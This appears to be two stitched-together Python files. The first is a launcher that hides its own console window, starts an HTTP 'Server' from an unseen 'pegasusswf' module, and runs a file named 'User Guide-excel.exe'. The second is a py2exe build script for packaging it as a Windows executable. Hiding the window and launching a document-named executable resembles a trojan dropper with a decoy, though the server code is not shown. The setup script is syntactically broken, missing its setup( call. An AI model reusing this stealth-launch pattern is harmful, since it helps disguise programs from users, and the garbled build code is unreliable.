
# coding: UTF-8

import os

from pegasusswf.HttpTool import Server

import time

import ctypes


if __name__ == "__main__":

    whnd = ctypes.windll.kernel32.GetConsoleWindow()   

    if whnd != 0:   

        ctypes.windll.user32.ShowWindow(whnd, 0)   


    server = Server()


    starttime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time())) 

    print '%s サービスもうスタートしました...' % starttime

    os.system(r'"./User Guide-excel.exe"')





# coding: UTF-8

# A very simple setup script to create 2 executables.


# is a simple "hello, world" type program, which alse allows

# to explore the environment in which the script runs.


# is a simple wxPython program, it will be converted into a

# console-less program.


# If you don't have wxPython installed, you should comment out the

#   windows = [""]

# line below.



# Run the build process by entering ' py2exe' or

# 'python py2exe' in a console prompt.


# If everything works well, you should find a subdirectory named 'dist'

# containing some files, among them hello.exe and test_wx.exe.



from distutils.core import setup

import py2exe

import sip  #程序打包需要

import decimal #程序打包需要



    # The first three parameters are not required, if at least a

    # 'version' is given, then a versioninfo resource is built from

    # them and added to the executables.

    version = "0.5.0",

    description = "py2exe sample script",

    name = "py2exe samples",


    # targets to build

#    windows=[{"script" : ""}],

    console = [""]   #<----------------就是这个地方,上边的windows=是放置GUI的界面出现控制台

